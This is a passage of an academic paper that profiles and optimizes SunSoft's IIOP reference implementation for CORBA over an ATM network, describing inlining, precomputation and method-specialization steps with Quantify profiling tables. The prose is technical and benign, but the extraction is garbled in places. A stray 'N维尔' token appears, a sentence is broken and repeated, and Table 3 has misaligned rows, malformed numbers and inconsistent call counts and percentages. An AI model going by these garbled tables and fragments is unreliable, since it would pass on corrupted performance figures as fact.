[8, 9, 10] show that the performance of CORBA implementations is poor compared to that of the low level implementations using C/C++ since the ORBs incur a significant amount of data copying, marshaling, demarshaling, and demultiplexing overhead. These results, however, were restricted to measuring the performance of communication between homogeneous ORBS. They do not measure the runtime costs of interoperability between heterogeneous ORBS. In addition, earlier work on measuring CORBA performance does not pro-
vide solutions for reducing key sources of ORB overhead.
In this paper, we measure the performance of the standard reference implementation of IIOP, written by SunSoft, using a CORBA/ATM testbed environment similar to [8, 9, 10]. We measure the performance of SunSoft IIOP and precisely pinpoint the performance overhead. In addition, we describe how we applied six principle-driven optimizations [21] to substantially improve the performance of SunSoft IIOP. These optimizations include: optimizing for the expected case; eliminating obvious waste; replacing general purpose methods with specialized, efficient ones; precomputing values, if possible; storing redundant state to speed up expensive operations; and passing information between layers.
The results of applying these optimization principles to SunSoft IIOP improved its performance 1.8 times for doubles, 3.3 times for longs, 3.75 times for shorts, 5 times for chars/octet, and 4.2 times for richly-typed structs over ATM networks. Our optimized IIOP implementation is now comparable to existing commercial ORBS [8, 9, 10] using the static invocation interface (SII) and around 2 to 4.5 times (depending on the data type) faster than commercial ORBS using the dynamic skeleton interface (DSI). The optimizations and the resulting speedups reported in this paper are essential for CORBA to be adopted as the standard for implementing high-bandwidth, low-latency distributed applications.
Improving IIOP performance is not our only requirement, however, since optimizations must not come at the expense of interoperability. Therefore, we illustrate that our optimized implementation of SunSoft IIOP interoperates seamlessly with Visigenic's VisiBroker for C++ ORB.
This paper is organized as follows. Section 2 outlines the CORBA reference model, the GIOP/IIOP interoperability protocols, and the SunSoft IIOP reference implementation; Section 3 presents the results of our performance optimizations of SunSoft IIOP over a high-speed ATM network; Section 4 compares our research with related work; and Section 5 provides concluding remarks.
2 Overview of CORBA, GIOP/IIOP, and the SunSoft IIOP Reference Implementation
CORBA ORBS allow clients to invoke methods on target object implementations without concern for where the object resides, what language the object is written in, what OS/hardware platform it runs on, or what communication protocols and networks are used to interconnect distributed objects. To support this level of transparency, the CORBA reference model defines the components in Figure 1. These components are defined as follows:
* **Object Implementation**: This defines operations that implement a CORBA interface definition language (IDL) interface.

- **Client**: This is the program entity that invokes an operation on a (potentially remote) object implementation.
- **Object Request Broker (ORB) core**: When a client invokes a method, the ORB core is responsible for delivering the request to the object and returning a response (if any) to the client. CORBA-conformant ORBS use the GIOP and IIOP interoperability protocols described in Section 2.1.
- **ORB Interface**: The ORB interface provides standard operations that allow an ORB to decouple applications from the implementation details of the ORB.
- **CORBA IDL Stubs and Skeletons**: CORBA IDL stubs and skeletons serve as the "glue" between the client and server applications, respectively, and the ORB.
- **Dynamic Invocation Interface (DII)**: The DII allows a client to directly access the underlying request mechanisms provided by an ORB. DII is used when the ORB has no compile-time knowledge of the interface it is implementing. To retrieve this information, it has to query the interface repository.
- **Dynamic Skeleton Interface (DSI)**: The DSI is the server side's analogue to the client side's DII. The DSI allows an ORB to deliver requests to an object implementation or ORB bridge that has no compile-time knowledge of the type of the object it is implementing.
- **Object Adapter**: The Object Adapter associates an object implementation with the ORB and demultiplexes incoming requests to the appropriate method of the target object.
2.1 Overview of CORBA GIOP and IIOP
The CORBA General Inter-ORB Protocol (GIOP) defines an interoperability protocol between heterogeneous ORBS. The GIOP protocol provides an abstract interface that can be mapped onto conventional connection-oriented transport protocols. A concrete mapping of GIOP onto the TCP/IP transport protocol is known as the Internet Inter-ORB Protocol (IIOP). An ORB supports GIOP if some entity associated with the
ORB is able to send and receive GIOP messages. The GIOP specification consists of the following elements:
- **Common Data Representation (CDR) definition:** The GIOP specification defines a transfer syntax called CDR. CDR maps OMG IDL types from the native host format to a bi-canonical representation that supports both little-endian and big-endian formats. CDR encoded messages are used to transmit CORBA requests and server responses across a network. All the OMG IDL data types are marshaled using the CDR syntax into an encapsulation. An encapsulation is an octet stream used to hold marshaled data.
- **GIOP Message Formats:** The GIOP specification defines seven types of messages that send requests, receive replies, locate objects, and manage communication channels;
- **GIOP Transport Assumptions:** The GIOP specification describes the assumptions made regarding transport protocols that can be used to carry GIOP messages. In addition, the GIOP specification defines a connection management protocol and a set of constraints for message ordering.
The GIOP and IIOP specifications are described further in Appendix A. The remainder of this section presents an overview of the SunSoft IIOP reference implementation and describes the primary components of its implementation.
## 2.2 Overview of the SunSoft IIOP Implementation
### 2.2.1 CORBA Features Supported by SunSoft IIOP
The SunSoft IIOP implementation is widely regarded as the reference implementation of IIOP. It is freely available from `ftp://ftp.omg.org/pub/interop/`. SunSoft IIOP is written in C++ and provides most of the features of a CORBA 2.0 ORB, except for an IDL compiler, an interface repository, and a Basic Object Adapter. Therefore, users must provide stubs and skeletons that integrate with the APIs provided by SunSoft IIOP.
On the client-side, SunSoft IIOP provides a static invocation interface (SII) and a dynamic invocation interface (DII). The SII is used by the client-side stubs and server-side skeletons generated by manually or by an IDL compiler. The DII is used by applications that have no compile-time knowledge of the interface they are calling. Thus, the DII allows applications to create CORBA requests at run-time. It marshals parameters by using interfaces containing methods of CORBA pseudo-object classes and by consulting the interface repository. Since SunSoft IIOP does not provide an IDL compiler, client stubs using the SII API must be hand-crafted.
On the server-side, SunSoft IIOP supports the dynamic skeleton interface (DSI). The DSI is used by applications (such as ORB bridges [15]) that have no compile-time knowledge of the interfaces they implement. The SunSoft IIOP does not provide an interface repository or an IDL compiler that can generate skeletons. Therefore, it uses the DSI mechanism to parse incoming requests, unmarshal the parameters, and demultiplex the request to the appropriate object implementation. Servers that use the SunSoft DSI mechanism must provide it with `TypeCode`² information that it uses to interpret incoming requests and demarshal the parameters.
### 2.2.2 SunSoft IIOP Components
The SunSoft IIOP implementation is based on an interpretive marshaling/demarshaling engine. The motivation for using an interpretive design is to reduce the size of the marshaling/demarshaling engine so that it resides within a processor cache. An alternative approach is to use a compiled marshaling/demarshaling engine [11]. A compiled approach is possible when the marshaling/demarshaling engine has compile-time knowledge of the structural layout of IDL interfaces and operation parameters.
The primary components in the SunSoft IIOP implementation are shown in Figure 2: Each component is described below:
- **The `TypeCode::traverse` method:** The `traverse` method of the CORBA::`TypeCode` class implements an IIOP `TypeCode` interpreter. All marshaling and demarshaling of parameters is performed interpretively by traversing the data structure according to the layout of the `TypeCode/request` tuple provided to `traverse`. This method is passed a pointer to a `visit` method (described below:
1. CORBA pseudo-objects are entities that are neither CORBA primitive types nor constructed types. Operations on pseudo-object references cannot be invoked using the DII mechanism since the interface repository does not keep any information about them. In addition, only some pseudo-objects (such as `TypeCode` and `Any`) can be transferred as parameters to methods of an interface.
2. `TypeCodes` are CORBA pseudo-objects that describe the format and layout of primitive and constructed IDL data types in the incoming request stream.
below), which interprets CORBA requests based on their TypeCode layout. The request part of the tuple contains the data that was received from an application (i.e., on the client-side) or from the protocol stack (i.e., on the server-side).
- **The visit method**: The TypeCode interpreter invokes the visit method to marshal or demarshal the data associated with the TypeCode it is currently interpreting. The visit method is a pointer to a method that contains the address of one of the four methods described below:
- **The CDR::encoder method** – The encoder method of the CDR class encodes various data types from their native host representation to the CDR representation used to transmit CORBA requests over the network.
- **The CDR::decoder method** – The decoder method of the CDR class retrieves request values in the native host representation from the incoming CDR stream.
- **The deep_copy method** – The deep_copy method is used by the SunSoft DII mechanism to create requests and marshal parameters into the CDR stream using the TypeCode interpreter.
- **The deep_free method** – The deep_free method is used by the DSI server to free allocated memory after incoming data has been demarshaled and passed to a server application.
- **The utility methods**: SunSoft IIOP provides several methods that perform various utility tasks. The two most important utility methods include:
- **The calc_nested_size_and_alignment method** – This method calculates the size and alignment of various fields that comprise an IDL struct.
- **The struct_traverse method** – This method is used by the TypeCode interpreter to traverse the fields in an IDL struct.
### 2.2.3 Tracing the Data Path of an IIOP Request
To illustrate the run-time behavior of SunSoft IIOP, we trace the path taken by requests that transmit a sequence of BinStructs (shown in Appendix B). We show how the TypeCode interpreter consults the TypeCode information as it marshals and unmarshals parameters. The same BinStruct is used in our experiments described in Section 3.2.
- **TypeCode Layout for BinStructs**: Figure 3 depicts the internal representation of TypeCode information that defines the sequence of BinStructs shown in Appendix B. The layout of the sequence of BinStructs and its parameters are described below:
- **TypeCode value** – A CORBA TypeCode data structure contains a _kind field that indicates the TCKind value, which is an enumerated type. In our “sequence of BinStruct” example, the TCKind value is tk.sequence.
- **TypeCode length and byte order** – The length field indicates the length of the buffer that holds the CDR representation of the TypeCode’s parameters. In this example, the first byte of the CDR buffer indicates the byte order. Here, the value 0 indicates that big-endian byte-ordering is used.
- **Element type** – For a sequence TypeCode, the next entry in the buffer is the TypeCode kind entry for the element type that makes the sequence. In our example, this value is tk.struct.
- **Encapsulation length and sequence bound** – The next entry is a length field indicating the length of the encapsulation that holds information about the struct’s members. The length field is followed by the encapsulation, followed by a field that indicates the bounds of the sequence. A value of 0 indicates an “unbounded” sequence (i.e., the size of the sequence is determined at run-time, not at compile-time).
- **Encapsulation content and field layouts** – The encapsulation is made up of two string entries, which follow the designation of the encapsulation’s byte-order. Each string entry has to have a length field specifying the length of the string followed by the string values. Following this field is a number indicating the number of members in the BinStruct IDL struct. This is followed by TypeCode layouts for each field in the struct.
- **Client-side Data Path**: The client-side data path is shown in Figure 4. This figure depicts the path traced by requests through the TypeCode interpreter. The CDR::encoder method marshals the parameters from native host format into a CDR representation suitable for transmission on the network.
The client uses the do.call method, which is the SII API provided by SunSoft IIOP that uses the TypeCode interpreter to marshal the parameters and send the requests.
The do.call method creates a CDR stream into which operations for CORBA parameters are marshaled before they are sent over the network. To marshal the parameters, do.call uses the CDR::encoder_visit method. For primitive types (such as octet, short, long, and double), the CDR::encoder method marshals them into the CDR stream using the low-level CDR::put methods. For constructed data types (such as IDL structs and sequences), the encoder invokes the TypeCode interpreter.
The traverse method of the TypeCode interpreter consults the TypeCode layout passed to it by an application to determine the data types that comprise a constructed data type. For each member of a constructed data type, the interpreter invokes the same visit method that invoked it. In our case, the encoder is the visit method that originally called the interpreter. This process continues recursively until all parameters have been marshaled. At this point the request is transmitted over the network via the GIOP::Invocation::invoke method.
- **Server-side Data Path:** The server-side data path shown in Figure 5 depicts the path traced by requests through the TypeCode interpreter. The CDR::decoder method unmarshals the parameters from the CDR representation into the server’s native host format. An event handler (TCP_OA) waits for incoming data. After a CORBA request is received, its GIOP type is decoded. The server’s dispatching mechanism then dispatches the request to a skeleton via a user supplied upcall.
Since SunSoft IIOP does not provide a standard CORBA Object Adapter, the server programmer must write a tcp_oa.dispatch method that dispatches the request to the correct skeleton. The request demultiplexing and dispatching process can use any of a number of strategies to demultiplex requests to skeletons. These strategies include linear searching or hashing of operation names.
The SunSoft receiver supports the DSI mechanism. Therefore, an N维尔 CORBA pseudo-object is created and populated with the TypeCode information for the parameters retrieved from the incoming request. These parameters are retrieved by calling the ServerRequest::params method. As with the client, the server’s TypeCode interpreter uses the CDR::decoder_visit method to unmarshal individual data types into parameters that are subsequently passed to the server application’s upcall method.
3 Experimental Results of CORBA IIOP over ATM
3.1 CORBA/ATM Testbed Environment
3.1.1 Hardware and Software Platforms
The experiments in this section were conducted using a Bay Networks LattisCell 10114 ATM switch connected to two dual-processor UltraSPARC-2s running SunOS 5.5.1. The LattisCell 10114 is a 16 Port, OC3 155 Mbs/port switch. Each UltraSPARC-2 contains two 168 MHz Ultra SPARC CPUs with a 1 Megabyte cache per-CPU. The SunOS 5.5.1 TCP/IP protocol stack is implemented using the STREAMS communication framework [17]. Each UltraSPARC-2 has 256 Mbytes of RAM and an ENI-155s-MF ATM adapter card, which supports 155 Megabits per-sec (Mbps) SONET multimode fiber. The Maximum Transmission Unit (MTU) on the ENI ATM adaptor is 9,180 bytes. Each ENI card has 512 Kbytes of on-board memory. A maximum of 32 Kbytes is allotted per ATM virtual circuit connection for receiving and transmitting frames (for a total of 64 K). This allows up to eight switched virtual connections per card. This hardware platform is shown in Figure 6.
3.1.2 Traffic Generator for Throughput Measurements
Traffic for the experiments was generated and consumed by an extended version of the widely available ttcp [20] protocol benchmarking tool. We extended ttcp for use with SunSoft IIOP. We hand-crafted the stubs and skeletons for the different methods defined in the interface. Our hand-crafted stubs use the SII API (do.call method) provided by SunSoft IIOP. On the server-side, the Object Adaptor uses a callback method (supplied by the ttcp server application) to dispatch incoming requests along with parameters to the target object.
Our ttcp tool measures end-to-end data transfer throughput in Mbps from a transmitter process to a remote receiver process across an ATM network. The flow of user data for each version of ttcp is unidirectional, with the transmitter flooding the receiver with a user-specified number of data buffers. Various sender and receiver parameters may be selected at run-time. These parameters include the number of
data buffers transmitted, the size of data buffers, and the type of data in the buffers. In all our experiments the underlying socket queue sizes were enlarged to 64 Kbytes (which is the maximum supported on SunOS 5.5.1).
The following data types were used for all the tests: primitive types (short, char, long, octet, double) and a C++ struct composed of all the primitives (BinStruct). The size of the BinStruct is 32 bytes. The IIOP implementation transferred the data types using IDL sequences, which are dynamically-sized arrays. The IDL declaration is shown in the appendix. The sender side transmitted data buffer sizes of a specific data type incremented in powers of two, ranging from 1 Kbyte to 128 Kbytes. These buffers were repeatedly sent until a total of 64 Mbytes of data was transmitted.
3.1.3 Profiling Tools
The profile information for the empirical analysis was obtained using the Quantify [19] performance measurement tool. Quantify analyzes performance bottlenecks and identifies sections of code that dominate execution time. Unlike traditional sampling-based profilers (such as the UNIX gprof tool), Quantify reports results without including its own overhead. In addition, Quantify measures the overhead of system calls and third-party libraries without requiring access to source code. All data is recorded in terms of machine instruction cycles and converted to elapsed times according to the clock rate of the machine. The collected data reflect the cost of the original program's instructions and automatically exclude any Quantify counting overhead.
Additional information on the run-time behavior of the code such as system calls made, their return values, signals, number of bytes written to the network interface, and number of bytes read from the network interface are obtained using the UNIX truss utility, which traces the system calls made by an application. truss is used to observe the return values of system calls such as write and read. This indicates the number of attempts made to write a buffer to a network and read a buffer from the network.
3.2 Performance Results and Optimization Benefits
3.2.1 Methodology
This section describes the optimizations we applied to SunSoft IIOP to improve its throughput performance over ATM networks. First, we show the performance of the original SunSoft IIOP for a range of IDL data types. Next, we use Quantify to illustrate the key sources of overhead in SunSoft IIOP. Finally, we describe the benefits of the optimization principles we applied to improve the performance of SunSoft IIOP.
The optimizations described in this section are based on principles for efficiently implementing protocols. [21] describes these principles in detail and describes how they are applied in existing protocol implementations, e.g., TCP/IP. We focus on the principles in Table 1 that improve IIOP performance. When describing our optimizations, we refer to these principles and explain how their use is justified.
The SunSoft IIOP optimizations were performed in the following four steps, corresponding to the principles from Table 1:
1. Inlining to optimize for the expected case – which is discussed in Section 3.2.3;
2. Aggressive inlining to optimize for the expected case – which is discussed in Section 3.2.4;
3. Precomputing, adding redundant state, and passing information through layers – which is discussed in Section 3.2.5;
4. Eliminating obvious waste and specializing generic methods – which is discussed in Section 3.2.6.
For each step, we describe the optimizations we applied to reduce the overhead remaining from the previous steps. After each step, we show the improved throughput measurements for various data types. In addition, we compare the throughput obtained in the previous steps with that obtained in the current step. The comparisons focus on data types that exhibited the widest range of performance. First two optimization steps shown below do not significantly improve
performance. However, these steps are important since they reveal the actual sources of overhead that are alleviated by the optimizations in steps three and four reported below.
3.2.2 Performance of the Original IIOP Implementation
- **Sender-side performance:** Figure 7 illustrates the sender-side throughput obtained for sending 64 Mbytes of various data types for sender buffer sizes ranging from 1 Kbyte to 128 Kbytes, incremented in powers of two. These results indicate that different data types achieved different levels of throughput. The highest throughput results from sending doubles, whereas BinStructs displayed the worst behavior. This variation in behavior stems from the marshaling and demarshaling overhead for different data types, as well as from the use of the interpretive marshaling/demarshaling engine in SunSoft IIOP that results in a large number of recursive method calls.
Tables 2 and 3 present the results of using the Quantify profiling tool to send 64 Mbytes of various data types using a 128 Kbyte sender buffer. The sender-side results reveal that for all data types, the sender spends most of its run-time performing write system calls to the network. In addition, the table reveals that BinStructs took the most amount of time to send, whereas doubles took the least.
- **Receiver-side performance:** The receiver-side results\(^3\) for sending primitive data types indicate that most of the run-time costs are incurred by (1) the TypeCode interpreter (TypeCode::traverse), (2) the CDR methods that retrieve the value from the incoming data (e.g., get_long and get_short), (3) the method deep_free that deallocates memory, and (4) the CDR::Decoder method. For BinStructs, the receiver spends a significant amount of time traversing the BinStruct::TypeCode (struct.traverse) and calculating the size and alignments of each member in the struct.
The receiver's run-time costs affect the sender adversely by increasing the time required to perform write system calls to the network. This happens due to the transport protocol flow control enforced by the receiving side, which cannot keep pace with the sender due to the excessive presentation layer overhead.
The remainder of this section describes the various optimizations we incorporated into the original IIOP implementation, as well as the motivations for applying these optimizations. After apply the optimizations, we examine the new throughput measurements for sending different data types. In addition, we show how our optimizations affect the performance of the best case (doubles) and the worst case (BinStruct). Likewise, detailed profiling results from Quantify are provided only for the best and the worst cases.
\[^3\]Throughput measurements from the receiver-side were nearly identical to the sender measurements and are not presented here.

Tables 2 and 3 illustrate the receiver is the principal performance bottleneck. Therefore, our optimizations are designed to improve receiver performance. Since receiver is the bottleneck, we only show the profile measurements for the receiver.
3.2.3 Optimization Step 1: Inlining to Optimize for the Expected Case
- **Problem:** invocation overhead for small, frequently called methods: This subsection describes an optimization to improve the performance of IIOP receivers. We applied Principle 1 from Table 1, which optimizes for the expected case. Table 3 illustrates that depending on the data type, the appropriate get method of the CDR class must be invoked to retrieve the data from the incoming stream into a local copy. Since the get methods are always invoked they are prime targets for our first optimization step.
- **Solution:** inline method calls: Our solution to reduce invocation overhead for small, frequently called methods was to designate these methods as inline, using C++ language features. The throughput measurements after inlining the get methods are shown in Figure 8. Figures 9 and 10 illustrate the effect of inlining on the throughput of doubles and BinStructs. Figures 9 and 10 also compare the new results with the original results.
- **Optimization results:** After inlining, the new throughput results indicate only a marginal (i.e., 3-4%) increase in performance. Table 4 and 5 shows profiling measurements for the sender and receiver, respectively. The analysis of overhead for the sender-side receiver. The analysis of over-
Table 2: Sender-side Overhead in the Original IIOP Implementation
<table>
<thead>
<tr>
<th>Data Type</th>
<th>Method Name</th>
<th>msec</th>
<th>Called</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr>
<td>double</td>
<td>write</td>
<td>78,051</td>
<td>512</td>
<td>93.33</td>
</tr>
<tr>
<td></td>
<td>put_longlong</td>
<td>2,250</td>
<td>8,388,608</td>
<td>2.99</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>1,605</td>
<td>8,388,016</td>
<td>1.92</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>1,000</td>
<td>1,024</td>
<td>1.55</td>
</tr>
<tr>
<td>long</td>
<td>write</td>
<td>134,141</td>
<td>512</td>
<td>92.92</td>
</tr>
<tr>
<td></td>
<td>put_long</td>
<td>3,799</td>
<td>16,780,238</td>
<td>2.63</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>3,103</td>
<td>16,781,284</td>
<td>2.47</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>2,998</td>
<td>1,024</td>
<td>1.80</td>
</tr>
<tr>
<td>short</td>
<td>write</td>
<td>265,392</td>
<td>512</td>
<td>93.02</td>
</tr>
<tr>
<td></td>
<td>put_short</td>
<td>7,993</td>
<td>33,554,432</td>
<td>2.66</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>6,598</td>
<td>33,559,040</td>
<td>2.31</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>5,195</td>
<td>1,024</td>
<td>1.82</td>
</tr>
<tr>
<td>octet</td>
<td>write</td>
<td>530,134</td>
<td>512</td>
<td>93.43</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>15,986</td>
<td>67,113,472</td>
<td>2.82</td>
</tr>
<tr>
<td></td>
<td>cdr::byte</td>
<td>10,291</td>
<td>67,118,000</td>
<td>1.83</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>10,388</td>
<td>1,024</td>
<td>1.83</td>
</tr>
<tr>
<td>BinStruct</td>
<td>write</td>
<td>588,039</td>
<td>512</td>
<td>88.65</td>
</tr>
<tr>
<td></td>
<td>get_long</td>
<td>19,846</td>
<td>44,083,504</td>
<td>2.99</td>
</tr>
<tr>
<td></td>
<td>calc_nested.size...</td>
<td>11,499</td>
<td>14,683,648</td>
<td>1.73</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>10,394</td>
<td>31,461,888</td>
<td>1.57</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>8,803</td>
<td>4,195,328</td>
<td>1.33</td>
</tr>
</tbody>
</table>
Table 3: Receiver-side Overhead in the Original IIOP Implementation
<table>
<thead>
<tr>
<th>Data Type</th>
<th>Method Name</th>
<th>msec</th>
<th>Called</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr>
<td>double</td>
<td>TypeCode::traverse</td>
<td>2,598</td>
<td>1,539</td>
<td>23.88</td>
</tr>
<tr>
<td></td>
<td>cdr::get_longlong</td>
<td>2,596</td>
<td>8,388,608</td>
<td>23.80</td>
</tr>
<tr>
<td></td>
<td>deep::free</td>
<td>1,645</td>
<td>8,388,608</td>
<td>15.10</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>1,551</td>
<td>8,395,797</td>
<td>14.21</td>
</tr>
<tr>
<td></td>
<td>read</td>
<td>1,146</td>
<td>1,866</td>
<td>10.51</td>
</tr>
<tr>
<td>long</td>
<td>TypeCode::kind</td>
<td>799</td>
<td>8,389,120</td>
<td>7.31</td>
</tr>
<tr>
<td></td>
<td>cdr::get_longlong</td>
<td>5,194</td>
<td>1,539</td>
<td>25.31</td>
</tr>
<tr>
<td></td>
<td>cdr::get_PTT</td>
<td>4,956</td>
<td>16,783,379</td>
<td>22.40</td>
</tr>
<tr>
<td></td>
<td>deep::free</td>
<td>3,295</td>
<td>16,784,241</td>
<td>16.06</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>3,099</td>
<td>16,784,405</td>
<td>15.10</td>
</tr>
<tr>
<td></td>
<td>read</td>
<td>1,682</td>
<td>2,274</td>
<td>8.40</td>
</tr>
<tr>
<td>short</td>
<td>TypeCode::traverse</td>
<td>1,598</td>
<td>16,777,728</td>
<td>7.79</td>
</tr>
<tr>
<td></td>
<td>cdr::get_short</td>
<td>10,387</td>
<td>1,539</td>
<td>27.22</td>
</tr>
<tr>
<td></td>
<td>deep::free</td>
<td>9,188</td>
<td>33,554,432</td>
<td>24.07</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>9,194</td>
<td>33,559,615</td>
<td>17.27</td>
</tr>
<tr>
<td></td>
<td>TypeCode::kind</td>
<td>3,196</td>
<td>33,554,944</td>
<td>8.37</td>
</tr>
<tr>
<td>octet</td>
<td>TypeCode::traverse</td>
<td>20,773</td>
<td>1,539</td>
<td>29.30</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>13,984</td>
<td>67,118,003</td>
<td>19.71</td>
</tr>
<tr>
<td></td>
<td>deep::free</td>
<td>13,182</td>
<td>67,109,889</td>
<td>18.59</td>
</tr>
<tr>
<td></td>
<td>cdr::get_byte</td>
<td>10,787</td>
<td>67,118,113</td>
<td>15.22</td>
</tr>
<tr>
<td></td>
<td>TypeCode::kind</td>
<td>6,391</td>
<td>67,109,376</td>
<td>9.02</td>
</tr>
<tr>
<td>BinStruct</td>
<td>get_long</td>
<td>35,021,118</td>
<td>85,921,421</td>
<td>27.65</td>
</tr>
<tr>
<td></td>
<td>struct_traverse</td>
<td>23,041,20</td>
<td>29,270,880</td>
<td>18.31</td>
</tr>
<tr>
<td></td>
<td>calc_nested.size...</td>
<td>15,154,42</td>
<td>4,199,304</td>
<td>11.94</td>
</tr>
<tr>
<td></td>
<td>struct_traverse</td>
<td>10,406,70</td>
<td>33,561,621</td>
<td>8.21</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>10,401</td>
<td>6,092,995</td>
<td>8.20</td>
</tr>
<tr>
<td></td>
<td>deep::free</td>
<td>6,492</td>
<td>14,681,080</td>
<td>5.11</td>
</tr>
<tr>
<td></td>
<td>cdr::get_byte</td>
<td>6,394</td>
<td>33,566,720</td>
<td>5.94</td>
</tr>
<tr>
<td></td>
<td>cdr::decoder</td>
<td>3,399</td>
<td>21,153,513</td>
<td>2.88</td>
</tr>
</tbody>
</table>
Table 4: Sender-side Overhead After Applying the First Optimization (lining)
<table>
<thead>
<tr>
<th>Data Type</th>
<th>Method Name</th>
<th>msec</th>
<th>Called</th>
<th>%</th>
</tr>
</thead>
<tbody>
<tr>
<td>double</td>
<td>write</td>
<td>86,190</td>
<td>512</td>
<td>93.08</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>2,254</td>
<td>8,383,216</td>
<td>3.78</td>
</tr>
<tr>
<td></td>
<td>TypeCode::traverse</td>
<td>1,000</td>
<td>1,024</td>
<td>1.51</td>
</tr>
<tr>
<td>BinStruct</td>
<td>write</td>
<td>436,694</td>
<td>512</td>
<td>85.00</td>
</tr>
<tr>
<td></td>
<td>calc_nested.size...</td>
<td>13,195</td>
<td>14,683,648</td>
<td>2.90</td>
</tr>
<tr>
<td></td>
<td>cdr::encoder</td>
<td>14,213</td>
<td>31,461,888</td>
<td>2.77</td>
</tr>
</tbody>
</table>
3.2.4 Optimization Step 2: Aggressive Inlining to Optimize for the Expected Case
- Problem: lack of C++ compiler support for aggressive inlining: The second optimization step continues with Principle 1 (optimizing for the expected case). Our Quantify results in Section 3.2.3 reveal that supplying the inline keyword to the compiler does not always work since the compiler occasionally ignores this "hint." Likewise, Table 5 reveals that inlining some methods may "uninline" others.
4The cdr::ptr::align::binary is a static method that aligns a given address at the specified alignment.
- Solution: replace inline methods with preprocessor macros: In our second optimization step, therefore, we employ a more aggressive inlining strategy. Methods like cdr::ptr::align::binary, which became unlined, are now forcibly inlined by defining them as preprocessor macros instead of as C++ inline methods.
The Sun C++ compiler did not include certain methods (such as cdr::ptr::align::binary) due to their size. For instance, the code in method cdr::ptr::align::binary swaps 16 bytes in an manually un-rolled loop if the arriving data was in a different byte order. This increases the size of the code, which caused the C++ compiler to ignore the inline keyword.
To handle this problem, we defined a helper method that performs the byte swapping. This helper method is invoked only if byte swapping is necessary. This decreases the size of the code so that the compiler selected the method for inlining. For our experiments, this optimization was valid since we were transferring data between UltraSPARC machines with
the same byte order.
- **Optimization results:** The results of our aggressive inlining are shown in Figure 11. A comparison of throughput obtained for this optimization step with that of step 1 is shown in Figure 12 (for doubles) and Figure 13 (for BinStructs). The results reveal that the performance for sending doubles remains almost the same as that obtained in Section 3.2.3. The results for sending BinStructs reveal that performance degrades and becomes comparable to the unoptimized original SunSoft iop implementation.
To understand this behavior, we observe the profiling measurements shown in Table 6 for the receiver. The sender once again spends most of its run-time doing network writes. The receiver-side Quantify profile output reveals that aggressive inlining has indeed worked. But this inlining increases the code size for other methods (such as calc_nested.size and alignment, struct.traverse, CDR::decoder), thereby increasing their run-time costs. As shown in Figures 4 and 5, these methods are called a large number of times (indicated in Table 6).
Certain SunSoft iop Methods such as CDR::decoder and TypeCode::traverse are large and general-purpose.Inlining the methods described above causes further code bloat for these methods. Therefore, calling each other a large number of times results in a very high method call overhead. In addition, due to their large size, it is unlikely that code for both these methods can be resident in the processor cache at the same time, which further degrades performance.
In summary, although the second optimization step does not improve performance it is a necessary step since it reveals the actual sources of overhead in the code, as explained in Sections 3.2.5 and 3.2.6.
### 3.2.5 Optimization Step 3: Precomputing, Adding Redundant State, and Passing Information Through Layers
- **Problem: too many method calls:** The aggressive inlining optimization in Section 3.2.4 caused a slight degradation in performance, due primarily to processor cache effects. Table 6 reveals that for sending structs, the high cost methods are calc_nested.size and alignment, CDR::decoder, and struct.traverse. These methods are invoked a substantial number of times (29,367,801, 33,554,437, and 4,194,303 times, respectively) to process incoming requests.
To understand why so many method calls were made, we analyzed the calls to the method struct.traverse. The TypeCode interpreter invoked the struct.traverse method 2,097,152 times for data transmissions of 64 Mbytes in sequences of 32 bytes BinStructs. In addition, the TypeCode interpreter calculated the size of BinStruct, which called struct.traverse internally for every BinStruct. This accounted for an additional 2,097,152 calls.
Although inlining did not improve performance, it set the stage to answer the key question of why these high cost methods were invoked so frequently. As shown in Figure 5, and in the explanation in Section 2.2, we recognized that to demarshal an incoming sequence of BinStructs, the receiver’s TypeCode interpreter (TypeCode::traverse) must traverse each of its members using the method struct.traverse. As each member is traversed, this method determines the member’s size and alignment requirements using the calc_nested.size and alignment method. Each call to the calc_nested.size and alignment method can invoke the CDR::decoder method, which may invoke the traverse method.
Close scrutiny of the CORBA request datapath shown in Figure 5 reveals that the struct.traverse method calculates the size and alignment requirements each time it is invoked. As shown above, this yields a very large number of method calls for large streams of data.
- **Solution 1: reduce obvious waste by precomputing values and storing additional state:** At this point, we made a crucial observation: for incoming sequences, the TypeCode of each element is the same. With this observation, we can pinpoint the obvious waste (Principle 2 from Table I), which involves calculating the size and alignment requirements of each member (see Figures 4 and 5). In our experiments, the methods calc_nested.size and alignment and
struct_traverse are expensive. Therefore, optimizing them is crucial.
To eliminate this obvious waste, we can precompute (Principle 4) the size and alignment requirements of each member and store them using additional state (Principle 5) in order to speed up expensive operations. We store this additional state as private data members of the TypeCode class. Thus, the TypeCode for BinStruct will calculate the size and alignment once and store these in the private data members. Every time the interpreter wants to traverse BinStruct, it uses the TypeCode for BinStruct that already has its size and alignment precomputed.\footnote{Note that our additional state does not affect the IOIP protocol since this state is stored locally and is not passed across the network.}
- **Solution 2:** converts generic methods into special-purpose, efficient ones: To further reduce method call overhead and to decrease the potential for processor cache misses, we moved the struct_traverse logic for handling t.k.structs into the traverse method. This optimization illustrates an application of Principle 3, which converts generic methods into special-purpose, efficient ones. We chose to keep the traverse method generic, yet make it efficient since we want our demarshaling engine to remain in the cache.
- **Analysis and remedies:** Finally, we infer the following drawbacks and suggest solutions to them:
